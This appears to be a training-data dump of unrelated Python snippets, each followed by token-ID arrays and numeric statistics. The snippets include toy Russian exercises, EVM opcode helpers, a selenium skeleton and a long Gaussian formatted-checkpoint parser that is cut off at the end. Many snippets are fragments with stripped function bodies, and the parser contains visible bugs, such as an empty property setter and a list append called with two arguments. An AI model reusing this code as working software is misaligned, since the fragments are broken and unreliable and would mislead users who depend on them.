from tencentcloud.cloudaudit.v20190319 import models
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
23,
532,
9,
12,
198,
2,
15069,
357,
66,
8,
2177,
12,
7908,
2320,
43,
317,
1959,
15302,
11,
257,
9368,
1087,
1664,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11... | 3.619835 | 242 |
# p = 2 * u + 1
print("Прирожков", p(10))
pq = lambda u: 2 * u + 1
# m = p / 20
######
print("Накормить класс:", кг_муки_ученикам(22), "кг муки")
напечатать_привет()
print("Тебе придётся раскошелиться на" , цена_компа("i7", 16, 128), "€")
| [
2,
279,
796,
362,
1635,
334,
1343,
352,
198,
198,
4798,
7203,
140,
253,
21169,
18849,
21169,
25443,
114,
31583,
25443,
110,
1600,
279,
7,
940,
4008,
198,
198,
79,
80,
796,
37456,
334,
25,
362,
1635,
334,
1343,
352,
198,
198,
2,
28... | 1.27551 | 196 |
import json
from collections import namedtuple
from eth_typing import Address
from eth.vm.opcode_values import *
# list of opcodes that call code from another contract
ADDRESS_CALLING_OPCODES = [CALL, CALLCODE, STATICCALL, DELEGATECALL]
# list of opcodes that read addresses from the top of the stack
ADDRESS_READING_OPCODES = [BALANCE, EXTCODESIZE, EXTCODECOPY, EXTCODEHASH, SELFDESTRUCT]
# list of opcodes that write addresses onto the top of the stack
ADDRESS_CREATING_OPCODES = [CREATE, CREATE2]
# debug modes
MODE_NONE = 0 # transaction is just sent and mined
MODE_DEBUG = 1 # user is able to step through the computation steps
MODE_DEBUG_AUTO = 2 # user sees the changes that happen, but stepping happens in a given time interval
class MyAddress:
"""
Own data structure used to store Addresses and other relevant information.
"""
class MyContract(MyAddress):
"""
Own Contract data structure which parses abi and bytecode as json and provides methods to access them.
"""
def get_stack_content(stack: [], n: int) -> []:
"""
:param stack: The stack object as it is used by py-evm. This should be an array of Tuples which consists of the type
and value of the element. Example: [Tuple(int, 1), Tuple(bytes, b'\x00'] would be a stack with 2 elements.
:param n: The number of elements to retrieve.
:return: An array of length containing the first n elements of the stack, converted to a string and prepended
with "0x".
"""
size = len(stack)
result = []
for i in range(0, n):
if stack[size - (i + 1)][0] is int:
val = hex(stack[size - (i + 1)][1])
else:
val = "0x" + stack[size - (i + 1)][1].hex()
result.append(val)
return result
def hex2(n):
"""
Pads zeroes to an int so that the returned value has an even numbered length.
Examples: 1 -> "0x01", 100 -> "0x64", 255 -> "0xff", 256 -> "0x0100"
:param n: The int value to convert.
:return: Hex representation of n with "0x" prepended.
"""
x = '%x' % (n,)
return '0x' + ('0' * (len(x) % 2)) + x
| [
11748,
33918,
198,
6738,
17268,
1330,
3706,
83,
29291,
198,
6738,
4555,
62,
774,
13886,
1330,
17917,
198,
6738,
4555,
13,
14761,
13,
404,
8189,
62,
27160,
1330,
1635,
198,
198,
2,
1351,
286,
1034,
40148,
326,
869,
2438,
422,
1194,
277... | 2.765707 | 764 |
if __name__ == '__main__':
# arr = [1, 4, 8, 3, 2]
# print(search(arr))
arr = [1, 2, 3, 5, 8, 3, 2]
print(search(arr, 3))
arr = [5, 10, 9, 7, 4, 3, 2]
print(search(arr, 3))
| [
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1303,
5240,
796,
685,
16,
11,
604,
11,
807,
11,
513,
11,
362,
60,
198,
220,
220,
220,
1303,
3601,
7,
12947,
7,
3258,
4008,
628,
220,
22... | 1.862385 | 109 |
import traceback
from help_scripts import WebElementHandler
from help_scripts import BrowserWindowHandler
import time
from help_scripts import get_proxies
from help_scripts import selenium_operator as sop
# SEQUENCE OF DECISIONS TO MAKE IN ORDER OF 1 - 8
# SEQUENCE ORDER: 1
"""
BLANK
"""
# SEQUENCE ORDER: 2
# SEQUENCE ORDER: 3
# SEQUENCE ORDER: 4
# SEQUENCE ORDER: 5
# SEQUENCE ORDER: 6
# SEQUENCE ORDER: 7
# SEQUENCE ORDER: 8
| [
11748,
12854,
1891,
198,
198,
6738,
1037,
62,
46521,
1330,
5313,
20180,
25060,
198,
6738,
1037,
62,
46521,
1330,
34270,
27703,
25060,
198,
11748,
640,
198,
6738,
1037,
62,
46521,
1330,
651,
62,
1676,
87,
444,
198,
6738,
1037,
62,
46521,... | 3.013423 | 149 |
"""Low-level operations on Gaussian formatted checkpoint files.
Provides low-level interfaces to manipulate/extract data in Gaussian
formatted checkpoint files.
Attributes
----------
Methods
-------
get_data
Gets data from a FChk file for each quantity label.
get_hess_data
Gets or Builds Hessian data (eigenvectors and values).
Classes
-------
FChkIO
Main class to handle formatted checkpoint file operations.
Notes
-----
* While this module contains some basic error checks, it is intended to
be low-level, with no significant performance impacts. As a low-level
module, it should not be accessible to users but wrapped by developers
in charge of controlling that the queries are computationally AND
physically sound.
"""
import os # Used for file existence check
import re # Used to find keys in fchk file
from tempfile import TemporaryFile
from shutil import copyfileobj
import typing as tp
from math import ceil
from estampes import parser as ep
from estampes.base import ArgumentError, ParseDataError, ParseKeyError, \
QuantityError, TypeData, TypeDCrd, TypeDFChk, TypeDOrd, TypeQInfo, \
TypeQLvl, TypeQOpt, TypeQTag, TypeRSta
from estampes.data import property as edpr
# ================
# Module Constants
# ================
TypeQData = tp.Dict[str, tp.Optional[tp.Any]]
TypeKword = tp.Dict[str, tp.Tuple[str, int, int]]
TypeQKwrd = tp.Union[str, tp.List[str]]
NCOLS_FCHK = { # Maximum number of columns per type in fchk
'C': 5, # Number of columns for character data per line
'R': 5, # Number of columns for float data per line
'I': 6 # Number of columns for integer data per line
}
FCONV_FCHK = { # Conversion function for each type
'C': str,
'I': int,
'R': float
}
DFMT_FCHK = { # Data format for each type
'C': '{:12s}',
'I': '{:12d}',
'R': '{:16.8E}'
}
# ==============
# Module Classes
# ==============
class FChkIO(object):
"""Main class to handle formatted checkpoint file operations.
Main class to manage the parsing and formatting of data stored in
Gaussian formatted checkpoint file.
Attributes
----------
filename : str
Formatted checkpoint filename
version : str
Version, software-dependent
full_version : tuple
full version:
* Gaussian
* Gaussian major and minor revisions, mach and relesase date
Methods
-------
read_data(to_find, raise_error)
Extracts 1 or more data blocks from the fchk file
write_data(data, new_file, error_key, error_size)
Writes data corresponding to the keys to find.
show_keys()
Shows available keys in fchk if loaded
"""
@property
def filename(self) -> str:
"""Gets or sets the filename associated to the FChk object."""
return self.__fname
@filename.setter
@property
def version(self) -> tp.Dict[str, str]:
"""Returns the version of Gaussian used to generate the FChk.
Notes
-----
Earlier versions of Gaussian did not support this so this may be
empty.
"""
return self.__gversion
def show_keys(self):
"""Returns the available keys (only if loaded)."""
if self.__keys is None:
return None
else:
return sorted(self.__keys.keys())
@property
def full_version(self) -> tp.Tuple[str, tp.Any]:
"""Returns the full version, for the parser interface"""
return "Gaussian", self.__gversion
def read_data(self,
*to_find: tp.Tuple[str],
raise_error: bool = True) -> TypeQData:
"""Extracts data corresponding to the keys to find.
Parameters
----------
to_find
Key or list of keys to find.
raise_error
Only raises error if True, otherwise proceeds silently.
Raises
------
ParseKeyError
Key not found.
"""
keylist = [] # List of keywords to search
datlist = {} # type: TypeQData # List of data
# Fast Search
# -----------
# Uses the data in __keys to find pointers.
if self.__keys is not None:
# Build keyword list
# ^^^^^^^^^^^^^^^^^^
for item in to_find:
if not item.strip() in self.__keys:
if raise_error:
raise ParseKeyError(item)
else:
keylist.append([item, *self.__keys[item]])
# Sort the keys by order of appearance
keylist.sort(key=lambda x: x[3])
with open(self.filename, 'r') as fobj:
for item in keylist:
key, dtype, ndata, fpos = item
fobj.seek(fpos)
line = fobj.readline()
datlist[key] = self.__read_datablock(fobj, line, dtype,
ndata)
# Sequential Search
# -----------------
# Looks for keywords sequentially while reading file
else:
nkeys = len(to_find)
with open(self.filename, 'r') as fobj:
line = fobj.readline()
while line and nkeys > 0:
line = fobj.readline()
for key in to_find:
if line.startswith(key):
datlist[key] = self.__read_datablock(fobj, line)
nkeys -= 1
remaining = list(set(to_find) - set(datlist))
if len(remaining) > 0 and raise_error:
raise ParseKeyError(remaining[0])
return datlist
def write_data(self,
data: tp.Dict[str, tp.Sequence[tp.Any]],
new_file: tp.Optional[str] = None,
error_key: bool = True,
error_size: bool = True) -> None:
"""Writes data corresponding to the keys to find.
Reads a dictionary of keys and overwrites the data present in
the file.
If the key is not present or the size is inconsistent with the
data present in the file, an error is raised, except if
`error_key` or `error_size` are False, respectively.
Parameters
----------
data
Dictionary with the replacement data for each key.
new_file
Name of the file where data are printed.
If none, the internal file is overwritten.
error_key
If true, raises error if key not found.
error_size
If true, raises error for inconsistent size.
Raises
------
ParseKeyError
Key not found.
IndexError
Inconsistency in size between old and new data for a key.
"""
fmt_scal = {
'I': '{:<40s} I {:12d}\n',
'R': '{:<40s} R {:22.15E}\n',
'C': '{:<40s} C {:12s}\n',
}
fmt_head = '{:<40s} {:1s} N={:12d}\n'
# Compared available keys with those from new data set
# ----------------------------------------------------
keys_ok = {}
if self.__keys is not None:
# Uses the data in __keys to find pointers.
# Check if overlap between data and stored keys
keys = set(self.__keys) & set(data)
for key in keys:
keys_ok[self.__keys[key][-1]] = key
keys_no = list(set(data) - keys)
else:
nkeys = len(data)
keys_no = data.keys()
with open(self.filename, 'r') as fobj:
line = fobj.readline()
while line and nkeys > 0:
fpos = 0
if line[0] != ' ':
for index, key in enumerate(keys_no):
if line.startswith(key):
keys_ok[fpos] = keys_no.pop(index)
nkeys -= 1
fpos += len(line)
line = fobj.readline()
if keys_no and error_key:
raise ParseKeyError(', '.join(keys_no))
# Now set where data are to be saved
if new_file is None:
fdest = TemporaryFile()
else:
fdest = open(new_file, 'w')
# Now let us copy the content of the internal file in destination
# For each key retained after the analysis, we replace with the new
# data
with open(self.filename, 'r') as fsrc:
fpos = 0
for line in fsrc:
if fpos in keys_ok:
key = keys_ok[fpos]
dtype, ndat_ref, ncols, nlin_ref = self.__info_block(line)
ndat_new = len(data[key])
if ndat_ref == 0:
if ndat_new > 1 and error_size:
raise IndexError(f'Inconsistency with {key}')
else:
fdest.write(fmt_scal[dtype].format(key, data[key]))
else:
fdest.write(fmt_head.format(key, ndat_new))
for i in range(0, ndat_new, ncols):
N = min(ncols, ndat_new-i)
fmt = N*DFMT_FCHK[dtype] + '\n'
fdest.write(fmt.format(data[key][i:i+N]))
for _ in range(nlin_ref):
line = next(fsrc)
fpos += len(line)
else:
fdest.write(line)
fpos += len(line)
# Copy back file if requested
if new_file is not None:
fdest.seek(0)
fsrc.seek(0)
copyfileobj(fdest, fsrc)
def __store_keys(self) -> TypeKword:
"""Stores the keys in the fchk to speed up search.
Loads the keys present in the file and pointers to their
position to speed up their search.
Data type and block information are also stored.
Returns
-------
dict
For each key, returns a tuple with:
1. data type (I, R, C)
2. Number of values (0 for scalar)
3. position in files
"""
to_search = re.compile(r'''
(?P<title>[\w\s/\-]+?)\s* # Key
\b(?P<type>[IRC])\b\s* # Data type
(?P<block>N=)?\s+ # N= only set for non-scalar data
(?P<value>[\d\-\+\.E]+) # Block size (N=) or scalar value
$''', re.VERBOSE)
keys = {}
with open(self.filename, 'r') as fobj:
fpos = 0
for line in fobj:
res = to_search.match(line)
if res:
nval = int(res.group(3) and res.group(4) or 0)
keys[res.group(1)] = (res.group(2), nval, fpos)
fpos += len(line)
return keys
def __info_block(self, line: tp.Optional[str] = None,
datatype: tp.Optional[str] = None,
numdata: tp.Optional[int] = None
) -> tp.List[tp.Any]:
"""Extracts information on a given block.
Extracts information on a block, either from the line or data
in arguments.
Parameters
----------
line
Starting line of a block.
datatype
Type of data.
numdata
Number of data.
Returns
-------
str
Type of data.
int
Number of data.
int
Number of columns.
int
Number of lines.
Raises
------
ArgumentError
Arguments are insufficient to generate the data.
ParseDataError
Unsupported data types.
"""
if datatype is None and line is None:
raise ArgumentError('line and datatype cannot be both absent')
# If data type unknown, line has not been parsed
if datatype is None:
cols = line.split()
if 'N=' in line:
dtype = cols[-3]
ndata = int(cols[-1])
else:
dtype = cols[-2]
ndata = 0
else:
dtype = datatype
ndata = numdata
# Sets parameters:
try:
ncols = NCOLS_FCHK[dtype]
except KeyError:
raise ParseDataError(dtype, 'Unsupported data type')
nlines = int(ceil(ndata/ncols))
return dtype, ndata, ncols, nlines
def __read_datablock(self, fobj: tp.TextIO,
line: str,
datatype: tp.Optional[str] = None,
numdata: tp.Optional[int] = None
) -> tp.List[tp.Any]:
"""Reads a data block in the formatted checkpoint file.
Reads a data block from a Gaussian formatted checkpoint file.
The file "cursor" should be at the "title/section line" and the
content stored in 'line'.
Parameters
----------
fobj
Opened file.
line
Current line read from file object.
datatype
Type of the scalar or data block.
numdata
Size of the data block (0 if scalar).
Raises
------
ParseDataError
Unsupported data type.
Notes
-----
* The function uses readline() to extract the actual block.
* The parsing is mostly format-free for simplicity.
.. [1] http://gaussian.com/interfacing/?tabid=3
"""
dtype, _, _, nlines = self.__info_block(line, datatype, numdata)
# Sets parameters:
try:
fconv = FCONV_FCHK[dtype]
except KeyError:
raise ParseDataError(dtype, 'Unsupported data type')
# Data Extraction
# ---------------
if nlines == 0:
# Scalar
data = [fconv(line.split()[-1])]
else:
# Data Block
# We use a slightly different scheme for C since Gaussian cuts
# arbitrarily strings in the middle in the format
if dtype == 'C':
block = ''
for _ in range(nlines):
block += fobj.readline().rstrip('\n') # Remove newline
data = block.split()
else:
data = []
for _ in range(nlines):
line = fobj.readline()
data.extend([fconv(item) for item in line.split()])
return data
# ================
# Module Functions
# ================
def qlab_to_kword(qtag: TypeQTag,
qopt: TypeQOpt = None,
dord: TypeDOrd = None,
dcrd: TypeDCrd = None,
rsta: TypeRSta = None,
qlvl: TypeQLvl = None) -> TypeQKwrd:
"""Returns the keyword(s) relevant for a given quantity.
Returns the keyword corresponding to the block containing the
quantity of interest and the list all keywords of interest for
possible conversions.
Parameters
----------
qtag
Quantity identifier or label.
qopt
Quantity-specific options.
dord
Derivative order.
dcrd
Reference coordinates for the derivatives.
rsta
Reference state or transition:
- scalar: reference state
- tuple: transition
qlvl
Level of theory use to generate the quantity.
Returns
-------
list
List of keywords for the data to extract.
list
Information needed for extracting the quantity of interest.
1. keyword in the formatted checkpoint file
2. position of the first element in the data block
3. offsets for "sub-block" storage (data in several blocks)
Raises
------
NotImplementedError
Missing features.
QuantityError
Unsupported quantity.
ValueError
Unsupported case.
Notes
-----
- `n` refers to all available states.
"""
keywords = []
keyword = None
if qtag == 'natoms':
keyword = 'Number of atoms'
elif qtag == 'nvib':
keyword = 'Number of Normal Modes'
elif qtag == 'atmas':
keyword = 'Real atomic weights'
elif qtag == 'atnum':
keyword = 'Atomic numbers'
elif qtag == 'molsym':
raise NotImplementedError()
elif qtag == 'atcrd' or qtag == 2:
keyword = 'Current cartesian coordinates'
elif qtag in ('hessvec', 'hessval'):
if qtag == 'hessvec':
keyword = 'Vib-Modes'
else:
keyword = 'Vib-E2'
elif qtag == 'swopt':
keyword = 'Route'
elif qtag == 'swver':
keyword = 'Gaussian Version'
elif qtag == 'fcdat':
raise NotImplementedError()
elif qtag == 'vptdat':
raise NotImplementedError()
elif qtag in ('dipstr', 'rotstr'):
keywords = ['ETran scalars']
if isinstance(rsta, int) or rsta == 'c':
if qopt == 'H':
keyword = 'Vib-E2'
keywords.append('Number of Normal Modes')
else:
keyword = 'Anharmonic Vib-E2'
keywords.append('Anharmonic Number of Normal Modes')
else:
keyword = 'ETran state values'
else:
if isinstance(rsta, tuple):
keyword = 'ETran state values'
if qtag == 1 and dord == 0:
keywords = ['ETran scalars', 'SCF Energy']
else:
if qtag == 1:
if dord == 0:
if rsta == 'c':
keyword = 'Total Energy'
del keywords[:]
elif type(rsta) is int:
if rsta == 0:
keyword = 'SCF Energy'
else:
keyword = 'ETran state values'
keywords.append('Total Energy', 'ETran scalars')
elif dord == 1:
if dcrd is None or dcrd == 'X':
if rsta == 'c' or type(rsta) is int:
keyword = 'Cartesian Gradient'
elif dord == 2:
if dcrd is None or dcrd == 'X':
if rsta == 'c' or type(rsta) is int:
keyword = 'Cartesian Force Constants'
elif qtag == 50:
raise NotImplementedError()
elif qtag == 91:
raise NotImplementedError()
elif qtag == 92:
keyword = 'RotTr to input orientation'
elif qtag == 93:
keyword = 'RotTr to input orientation'
elif qtag == 101:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'Dipole Moment'
elif dord == 1:
if type(rsta) is int or rsta == 'c':
keyword = 'Dipole Derivatives'
elif qtag == 102:
if dord == 0:
if type(rsta) is int or rsta == 'c':
raise ParseDataError('Magnetic dipole not available')
elif dord == 1:
if type(rsta) is int or rsta == 'c':
keyword = 'AAT'
elif qtag == 103:
raise NotImplementedError()
elif qtag == 104:
raise NotImplementedError()
elif qtag == 105:
raise NotImplementedError()
elif qtag == 106:
raise NotImplementedError()
elif qtag == 107:
raise NotImplementedError()
elif qtag == 201:
raise NotImplementedError()
elif qtag == 202:
raise NotImplementedError()
elif qtag == 203:
raise NotImplementedError()
elif qtag == 204:
raise NotImplementedError()
elif qtag == 205:
raise NotImplementedError()
elif qtag == 206:
raise NotImplementedError()
elif qtag == 207:
raise NotImplementedError()
elif qtag == 208:
raise NotImplementedError()
elif qtag == 209:
raise NotImplementedError()
elif qtag == 300:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'Frequencies for FD properties'
else:
msg = 'Incident frequencies not available'
raise ParseDataError(msg)
else:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
keyword = 'Frequencies for DFD properties'
else:
msg = 'Incident frequencies not available'
raise ParseDataError(msg)
elif qtag == 301:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'Alpha(-w,w)'
elif dord == 1:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
keyword = 'Derivative Alpha(-w,w)'
elif qtag == 302:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'FD Optical Rotation Tensor'
elif dord == 1:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
keyword = 'Derivative FD Optical Rotation Tensor'
elif qtag == 303:
if type(rsta) is int or rsta == 'c':
raise ParseDataError('Alpha(w,0) not available')
elif qtag == 304:
if dord == 0:
if type(rsta) is int or rsta == 'c':
keyword = 'D-Q polarizability'
elif dord == 1:
if type(rsta) is int or rsta == 'c':
keyword = 'Derivative D-Q polarizability'
elif qtag == 305:
if dord == 0:
if type(rsta) is int or rsta == 'c':
raise NotImplementedError()
elif dord == 1:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
raise NotImplementedError()
elif qtag == 306:
if dord == 0:
if type(rsta) is int or rsta == 'c':
raise NotImplementedError()
elif dord == 1:
keywords = ['Number of atoms']
if type(rsta) is int or rsta == 'c':
raise NotImplementedError()
else:
raise QuantityError('Unknown quantity')
keywords.insert(0, keyword)
return keyword, keywords
def _parse_electrans_data(qtag: TypeQTag,
dblocks: TypeDFChk,
kword: str,
qopt: TypeQOpt = None,
dord: TypeDOrd = None,
dcrd: TypeDCrd = None,
rsta: TypeRSta = None
) -> TypeQData:
"""Sub-function to parse electronic-transition related data.
Parses and returns data for a given quantity related to an
electronic transition.
Parameters
----------
qtag
Quantity identifier or label.
dblocks
Data blocks, by keyword.
kword
Keyword for quantity of interest.
qopt
Quantity-specific options.
dord
Derivative order.
dcrd
Reference coordinates for the derivatives.
rsta
Reference state or transition:
- scalar: reference state
- tuple: transition
Returns
-------
dict
Data for each quantity.
Raises
------
ParseKeyError
Missing required quantity in data block.
IndexError
State definition inconsistent with available data.
QuantityError
Unsupported quantity.
"""
# ETran Scalar Definition
# -----------------------
# Check that ETran scalars are present and parse relevant values
key = 'ETran scalars'
if key in dblocks:
# Structure of ETran scalars
# 1. Number of electronic states
# 2. Number of scalar data stored per state
# 3. 1 of R==L transition matrix, 2 otherwise
# 4. Number of header words (irrelevant in fchk)
# 5. State of interest
# 6. Number of deriv. (3*natoms + 3: electric field derivatives)
(nstates, ndata, _, _, iroot,
_) = [item for item in dblocks[key][:6]]
else:
raise ParseKeyError('Missing scalars definition')
# States Information
# ------------------
initial, final = rsta
if initial != 0:
if final != 0:
raise IndexError('Unsupported transition')
else:
initial, final = final, initial
# Quantity-specific Treatment
# ---------------------------
if qtag == 2:
key = 'SCF Energy'
if key not in dblocks:
raise ParseKeyError('Missing ground-state energy')
energy0 = dblocks[key]
if final == 'a':
data = [dblocks[key][i*ndata]-energy0 for i in range(nstates)]
else:
fstate = final == 'c' and iroot or final
if fstate > nstates:
raise IndexError('Missing electronic state')
data = float(dblocks[key][(fstate-1)*ndata]) - energy0
elif qtag in (101, 102, 103):
lqty = edpr.property_data(qtag).dim
if qtag == 101:
if qopt == 'len':
offset = 1
else:
offset = 4
elif qtag == 102:
offset = 7
else:
offset = 10
if dord == 0:
if final == 'a':
data = [dblocks[kword][i*ndata+offset:i*ndata+offset+lqty]
for i in range(nstates)]
else:
fstate = final == 'c' and iroot or final
if fstate > nstates:
raise IndexError('Missing electronic state')
i0 = (fstate-1)*ndata + offset
data = dblocks[kword][i0:i0+lqty]
else:
raise QuantityError('Unsupported quantity')
return data
def _parse_freqdep_data(qtag: TypeQTag,
dblocks: TypeDFChk,
kword: str,
qopt: TypeQOpt = None,
dord: TypeDOrd = None,
dcrd: TypeDCrd = None,
rsta: TypeRSta = None
) -> TypeQData:
"""Sub-function to parse data on frequency-dependent properties.
Parses and returns data on a specific property for one or more
incident frequencies.
Parameters
----------
qtag
Quantity identifier or label.
dblocks
Data blocks, by keyword.
kword
Keyword for quantity of interest.
qopt
Quantity-specific options.
dord
Derivative order.
dcrd
Reference coordinates for the derivatives.
rsta
Reference state or transition:
- scalar: reference state
- tuple: transition
Returns
-------
dict
Data for each quantity.
Raises
------
ParseKeyError
Missing required quantity in data block.
IndexError
Error with definition of incident frequency.
QuantityError
Unsupported quantity.
"""
# Check Incident Frequency
# ------------------------
if qopt is None:
qopt_ = 0
elif not isinstance(qopt, int):
raise IndexError()
else:
qopt_ = qopt
# Quantity-specific Treatment
# ---------------------------
# Check size of derivatives is requested
if dord == 0:
nder = 1
elif dord == 1:
key = 'Number of atoms'
if key not in dblocks:
raise ParseKeyError('Missing number of atoms')
natoms = dblocks[key]
nder = 3*natoms
else:
raise IndexError('Unsupported derivative order')
if qtag == 301:
lqty = 9*nder
elif qtag == 302:
lqty = 9*nder
elif qtag == 303:
lqty = 9*nder
elif qtag == 304:
lqty = 18*nder
elif qtag == 305:
lqty = 18*nder
elif qtag == 306:
lqty = 18*nder
else:
raise QuantityError('Unsupported quantity')
lblock = len(dblocks[kword])
ndata = lblock // lqty # Assumed block is correctly built
if qopt_ == 0:
data = [dblocks[kword][i*lqty:(i+1)*lqty] for i in range(ndata)]
else:
if qopt_ > ndata:
raise IndexError('Incident frequency index out of range')
data = dblocks[kword][(qopt_-1)*lqty:qopt_*lqty]
return data
def parse_data(qdict: TypeQInfo,
qlab2kword: tp.Dict[str, str],
datablocks: TypeDFChk,
gver: tp.Optional[tp.Tuple[str, str]] = None,
raise_error: bool = True) -> TypeData:
"""Parses data arrays to extract specific quantity.
Parses data array to extract relevant information for each quantity.
Parameters
----------
qdict
Dictionary of quantities.
qlab2kword
mMin keyword for each quantity.
datablocks
Data blocks, by keyword.
gver
Gaussian version (major, minor).
raise_error
If True, error is raised if the quantity is not found.
Returns
-------
dict
Data for each quantity.
Raises
------
ParseKeyError
Missing required quantity in data block.
IndexError
State definition inconsistent with available data.
ValueError
Data inconsistency with respect to shape.
QuantityError
Unsupported quantity.
"""
data = {}
for qlabel in qdict:
qtag, qopt, dord, dcrd, rsta, qlvl = qdict[qlabel]
kword = qlab2kword[qlabel]
# Basic Check: main property present
# -----------
if kword not in datablocks and not empty_cases_ok(qtag, qopt):
if raise_error:
raise ParseKeyError('Missing quantity in file')
else:
data[qlabel] = None
continue
data[qlabel] = {}
# Basic Properties/Quantities
# ---------------------------
if qtag == 'natoms':
data[qlabel]['data'] = int(datablocks[kword])
elif qtag in ('atcrd', 2):
data[qlabel]['data'] = ep.reshape_dblock(datablocks[kword], (3, ))
elif qtag in ('atmas', 'atnum'):
data[qlabel]['data'] = datablocks[kword]
elif qtag == 'swopt':
data[qlabel]['data'] = ' '.join(datablocks[kword])
elif qtag == 'molsym':
raise NotImplementedError()
elif qtag == 'swver':
pattern = re.compile(r'(\w+)-(\w{3})Rev([\w.+]+)')
res = re.match(pattern, ''.join(datablocks[kword])).groups()
data[qlabel] = {'major': res[1], 'minor': res[2],
'system': res[0], 'release': None}
# Vibrational Information
# -----------------------
# Technically state should be checked but considered irrelevant.
elif qtag == 'nvib':
if kword in datablocks:
data[qlabel]['data'] = int(datablocks[kword])
else:
# For a robust def of nvib, we need the symmetry and
# the number of frozen atoms. For now, difficult to do.
raise NotImplementedError()
elif qtag in ('hessvec', 'hessval'):
if kword in datablocks:
data[qlabel]['data'] = datablocks[kword]
# Vibronic Information
# --------------------
elif qtag == 'fcdat':
raise NotImplementedError()
# Anharmonic Information
# ----------------------
elif qtag == 'vptdat':
raise NotImplementedError()
# State(s)-dependent quantities
# -----------------------------
else:
# Transition moments
# ^^^^^^^^^^^^^^^^^^
if type(rsta) is tuple:
data[qlabel]['data'] = _parse_electrans_data(qtag, datablocks,
kword, qopt, dord,
dcrd, rsta)
# States-specific Quantities
# ^^^^^^^^^^^^^^^^^^^^^^^^^^
else:
key = 'ETran scalars'
if key in datablocks:
(nstates, ndata, _, _, iroot,
_) = [item for item in datablocks[key][:6]]
curr_sta = rsta == 'c' or rsta == iroot
# Only energy is currently computed for all states:
if rsta == 'a' and qtag == 2:
data = [float(datablocks[kword][i*ndata])
for i in range(nstates)]
# Data for current electronic states
elif curr_sta:
if qtag in ('dipstr', 'rotstr'):
if qlvl == 'H':
key = 'Number of Normal Modes'
else:
key = 'Anharmonic Number of Normal Modes'
if key not in datablocks:
raise ParseKeyError('Missing necessary dimension')
ndat = int(datablocks[key])
if qtag == 'dipstr':
offset = 7*ndat
else:
offset = 8*ndat
data[qlabel]['data'] = \
datablocks[kword][offset:offset+ndat]
elif qtag == 1:
data[qlabel]['data'] = datablocks[kword]
elif qtag == 92:
data[qlabel]['data'] = datablocks[kword][:9]
elif qtag == 93:
data[qlabel]['data'] = datablocks[kword][9:]
elif qtag in (50, 91):
raise NotImplementedError()
elif qtag == 101:
if dord in (0, 1):
data[qlabel]['data'] = datablocks[kword]
else:
raise NotImplementedError()
elif qtag == 102:
if dord == 1:
data[qlabel]['data'] = datablocks[kword]
else:
raise NotImplementedError()
elif qtag == 300:
if dord in (0, 1):
if qopt == 0:
data[qlabel]['data'] = datablocks[kword]
else:
raise NotImplementedError()
elif qtag == 300:
if dord in (0, 1):
data[qlabel]['data'] = datablocks[kword]
else:
raise NotImplementedError()
else:
raise NotImplementedError()
return data
def get_data(dfobj: FChkIO,
*qlabels: str,
error_noqty: bool = True) -> TypeData:
"""Gets data from a FChk file for each quantity label.
Reads one or more full quantity labels from `qlabels` and returns
the corresponding data.
Parameters
----------
dfobj
Formatted checkpoint file as `FChkIO` object.
*qlabels
List of full quantity labels to parse.
error_noqty
If True, error is raised if the quantity is not found.
Returns
-------
dict
Data for each quantity.
Raises
------
TypeError
Wrong type of data file object.
ParseKeyError
Missing required quantity in data block.
IndexError
State definition inconsistent with available data.
QuantityError
Unsupported quantity.
"""
# First, check that the file is a correct instance
if not isinstance(dfobj, FChkIO):
raise TypeError('FChkIO instance expected')
# Check if anything to do
if len(qlabels) == 0:
return None
# Build Keyword List
# ------------------
# List of keywords
full_kwlist = []
main_kwlist = {}
qty_dict = {}
for qlabel in qlabels:
# Label parsing
# ^^^^^^^^^^^^^
qty_dict[qlabel] = ep.parse_qlabel(qlabel)
keyword, keywords = qlab_to_kword(*qty_dict[qlabel])
if keyword is not None:
full_kwlist.extend(keywords)
main_kwlist[qlabel] = keyword
# Check if list in the end is not empty
if not main_kwlist:
raise QuantityError('Unsupported quantities')
# Data Extraction
# ---------------
# Use of set to remove redundant keywords
datablocks = dfobj.read_data(*list(set(full_kwlist)), raise_error=False)
# Data Parsing
# ------------
gver = (dfobj.version['major'], dfobj.version['minor'])
try:
data = parse_data(qty_dict, main_kwlist, datablocks, gver, error_noqty)
except (QuantityError, NotImplementedError):
raise QuantityError('Unsupported quantities')
except (ParseKeyError, IndexError):
raise IndexError('Missing data in FChk')
return data
def get_hess_data(natoms: int,
get_evec: bool = True,
get_eval: bool = True,
mweigh: bool = True,
dfobj: tp.Optional[FChkIO] = None,
hessvec: tp.Optional[tp.List[float]] = None,
hessval: tp.Optional[tp.List[float]] = None,
atmass: tp.Optional[tp.List[float]] = None,
fccart: tp.Optional[tp.List[float]] = None
) -> tp.Tuple[tp.Any]:
"""Gets or builds Hessian data (eigenvectors and values).
This function retrieves or builds the eigenvectors and eigenvalues.
Contrary to ``get_data`` which only looks for available data, this
functions looks for alternative forms to build necessary data.
It also returns a Numpy array instead of Python lists.
Parameters
----------
natoms
Number of atoms.
get_evec
Return the eigenvectors.
get_eval
Return the eigenvalues.
mweigh
Mass-weight the eigenvectors (L = L/M^(-1/2)) for conversions.
dfobj
Formatted checkpoint file as `FChkIO` object.
hessvec
List containing the eigenvectors of the Hessian matrix.
hessval
List containing the eigenvalues of the Hessian matrix (in cm^-1).
atmass
List containing the atomic masses.
fccart
List containing the Cartesian force constants matrix.
Returns
-------
:obj:numpy.ndarray
Eigenvectors (None if not requested).
:obj:numpy.ndarray
Eigenvalues (None if not requested).
Raises
------
ValueError
Inconsitent values given in input.
IOError
Error if file object not set but needed.
IndexError
Quantity not found.
Notes
-----
* Numpy is needed to run this function
* Data can be given in argument or will be extracted from `dfobj`
"""
import numpy as np
read_data = []
if not (get_evec or get_eval):
raise ValueError('Nothing to do')
if natoms <= 1:
raise ValueError('Number of atoms must be possitive')
